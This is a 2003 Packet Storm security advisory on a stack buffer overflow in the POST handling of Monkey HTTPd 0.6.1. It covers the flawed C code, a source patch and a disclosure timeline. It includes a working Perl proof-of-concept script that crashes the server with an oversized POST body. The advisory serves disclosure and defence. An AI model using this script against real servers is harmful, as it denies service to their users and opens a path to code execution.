monkeyHTTPd.txt

2003-04-21T00:00:00
ID PACKETSTORM:31041
Type packetstorm
Reporter Matthew Murphy
Modified 2003-04-21T00:00:00

Description

                                        
                                            `Monkey HTTP Daemon Remote Buffer Overflow  
  
ABSTRACT  
  
"Monkey is a Web server written in C that works under Linux. This is an open  
source project based on the HTTP/1.1 protocol. The objective is to develop  
a fast, efficient, small and easy to configure web server."  
  
(quote from http://monkeyd.sourceforge.net)  
  
DESCRIPTION  
  
A buffer overflow vulnerability exists in Monkey's handling of forms  
submitted with the POST request method. The unchecked buffer lies in the  
PostMethod() procedure. The buffer allocated on line 3 of PostMethod():  
  
char buffer[MAX_REQUEST_BODY];  
  
Is of size MAX_REQUEST_BODY, which is defined as follows in monkey.h:  
  
#define MAX_REQUEST_BODY 10240 /* Maximo buffer del request */  
  
The security check on line 10 of the procedure:  
  
if(content_length_post<=0){  
  
is flawed. This results in a buffer overflow inside the loop below:  
  
memset(buffer,'\0',sizeof(buffer));  
for(i=4;i<strlen(post_buffer);i++){  
buffer[i-4]=post_buffer[i]; // Buffer overflow  
}  
  
ANALYSIS  
  
Because the buffer that is overrun is a local buffer, it will be on the  
stack of most architectures. If the system stores the return address on the  
stack, the potential for flow control exists. In such a case, successful  
exploitation yields the privileges of the monkey binary. An unsuccessful  
exploit attempt would cause the server to fail, denying service to other  
users.  
  
DETECTION  
  
This vulnerability was discovered in Monkey HTTPd v0.6.1.  
  
#!/usr/bin/perl  
# monkey-nuke.pl  
# Monkey HTTPd Remote Buffer Overflow  
# Discovery/Exploit by Matthew Murphy  
use IO::Socket;  
print STDOUT "What host to connect to \[\]\: ";  
$host = trim(chomp($line = <STDIN>));  
print STDOUT "What port to connect to \[80\]\: ";  
$port = trim(chomp($line = <STDIN>));  
$addr = "$host\:$port";  
print STDOUT "What script to submit to \[\/cgi-bin\/test\.pl\]\: ";  
$script = trim(chomp($line = <STDIN>));  
$buffer = "A"x11000;  
$exploit = "POST /$script HTTP/1.0\r\n";  
$exploit.= "Content-Type: application/x-www-form-urlencoded\r\n";  
$exploit.= "Content-Length: 11000\r\n\r\n";  
$exploit.= "$buffer\r\n\r\n";  
$f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$addr);  
print $f $exploit;  
sleep 5;  
undef $f;  
  
WORKAROUND  
  
In monkey.c, replace the line:  
  
if(content_length_post<=0){  
  
with:  
  
if(content_length_post<=0 || content_length_post >= MAX_REQUEST_BODY){  
  
Stop the server, re-build your binary, and restart the server.  
  
VENDOR RESPONSE  
  
The vendor was contacted on March 15, a fix was made public 9 days later on  
March 24. The fixed version, Monkey 0.6.2 is available at:  
  
Package  
TAR/GZ  
http://monkeyd.sourceforge.net/get_monkey.php?ver=4  
  
Debian packages (un-officially maintained by Mattias Fernandez) have not  
been updated as of time of writing.  
  
DISCLOSURE TIMELINE  
  
March 15, 2003: Initial developer notification  
March 18, 2003: Response from Eduardo Silva (edsiper@yahoo.es) indicates  
that vulnerability will be fixed by March 24  
March 23, 2003: Final contacts with developer  
March 24, 2003: Monkey HTTPd 0.6.2 released  
April 20, 2003: Public disclosure  
  
`